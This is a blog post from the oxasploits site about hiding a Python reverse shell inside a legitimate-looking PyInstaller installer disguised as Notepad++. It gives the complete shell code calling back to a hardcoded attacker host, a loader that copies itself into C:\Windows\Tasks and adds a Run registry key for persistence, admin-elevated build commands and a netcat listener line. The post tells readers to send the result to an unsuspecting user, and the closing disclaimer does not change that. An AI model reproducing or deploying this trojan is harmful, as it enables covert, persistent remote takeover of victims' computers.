Backdoors embedded along side installers

By Marshall Whittaker

Posted Dec 16, 2022 Updated Sep 10 3 min read

rev shell

What is PyInstaller and why do we need it?

PyInstaller is basically a binary that includes bundled within: python, your python dependancies, your python scripts, as well as any other binaries (.exe or .dll) that you would like to include. You may also link in an icon resource on build. Why do I use PyInstaller? Because it’s commonly enough used that it won’t be flagged itself as a virus or as malware, but I can still pack inside malicious code.

What malicious code

A legitamite installer or program can be any piece of compiled code (al la: into an .exe) that is not related to this project’s code can be imported in and executed at the same time my reverse shell starts. The malicious code does it’s business in the background, forking off as another process and copying itself to a new loocation, while the user is using the installer or program as normal, with no knowlwdge of the backdoor that is about to pop back through the firewall connecting “outbound” towards a netcat lisener. While this is happening, a registry key is created which enters our reverse shell into the system’s Administrator level startup chain. It’s easy to spot if you know what you are looking for, but genearlly, this will be persistent long enough that you can allot yourself a couple mistakes and still have access to the machine (not get locked out). If you happen to get disconnected, kill then restart the netcat listener per: nc -l -p 7777 -v (change the port as necessary), and within a couple seconds the reverse shell loops back aroun and fires off another connection request towardsd your listener with another Administrator shell.

The shell’s code

This isn’t particularly interesting shellcode, howver it is handy. I recommend editing it to your use case in Notepad++ because things like the attacker host and port are hard coded.

import os
import socket
import subprocess
import time
import sys

host = '01.dev.oxasploits.com'
port = 7887

def shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(str.encode("[*] Connect back from vicitim!\n"))
    s.send(str.encode(os.getlogin() + "\n\n"))
    while 1:
        try:       
            time.sleep(3)
            s.send(str.encode(os.getcwd() + "> "))
            data = s.recv(1024).decode("UTF-8")
            data = data.strip('\n')
            if data == "quit": 
                break
            if data[:2] == "cd":
                os.chdir(data[3:])
            if len(data) > 0:
                proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) 
                stdout_value = proc.stdout.read() + proc.stderr.read()
                output_str = str(stdout_value, "UTF-8")
                s.send(str.encode("\n" + output_str))
        except Exception as e:
             break
    s.close()

while 1:
    try:
        shell()
        sleep(15)
    except Exception as f:
        continue

The packed loader

import os
import time
import winreg
import shutil
import subprocess
from pathlib import Path

host = '01.dev.oxasploits.com'

def resource_path(relative_path):
    base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))
    return os.path.join(base_path, relative_path)

def registry_start(app_name, key_data=None, autostart: bool = True) -> bool:
    with winreg.OpenKey(
            key=winreg.HKEY_CURRENT_USER,
            sub_key=r'Software\Microsoft\Windows\CurrentVersion\Run',
            reserved=0,
            access=winreg.KEY_ALL_ACCESS,
    ) as key:
        try:
            if autostart:
                winreg.SetValueEx(key, app_name, 0, winreg.REG_SZ, key_data)
            else:
                winreg.DeleteValue(key, app_name)
        except OSError:
            return False
    return True

subprocess.Popen(resource_path('.\shell.exe'))
subprocess.Popen(resource_path('nppi.exe'))

pwnpath = r'C:\Windows\Tasks\taskserv.exe'
ppath = Path(pwnpath)
if not ppath.is_file():
        shutil.copyfile(resource_path('shell.exe'), pwnpath)
        registry_start('TaskServ', pwnpath)

Build

Then all you need to do is build the project with:

pyinstaller.exe --windowed --noconsole --onefile --uac-admin .\shell.py
copy dist\shell.exe .\
pyinstaller.exe --add-binary="shell.exe;." --add-binary="nppi.exe;." --icon=npp_103.ico --windowed --noconsole --onefile --uac-admin .\loader.py

Then run the .bat and send it on it’s way to be picked up by an unsuspecting computer user.

The End

In the end this is pretty evil code and should never be used against a target. Seriously, under any circumstances, ever. It looks benighn and totally comromises a machine while hiding it’s existance and persistently opens connections to pwn the machine.

Do. Not. Abuse. This. Code.

If you enjoy my work, sponsor or hire me! I work hard keeping oxasploits running!
Bitcoin Address:
bc1qclqhff9dlvmmuqgu4907gh6gxy8wy8yqk596yp

Thank you so much and happy hacking!

tools

This post is licensed under CC BY 4.0 by the author.

Backdoors embedded along side installers

Further Reading

Web app exploitation techniques

The importance of autonomous backups

Lock binaries in memory using vmtouch cache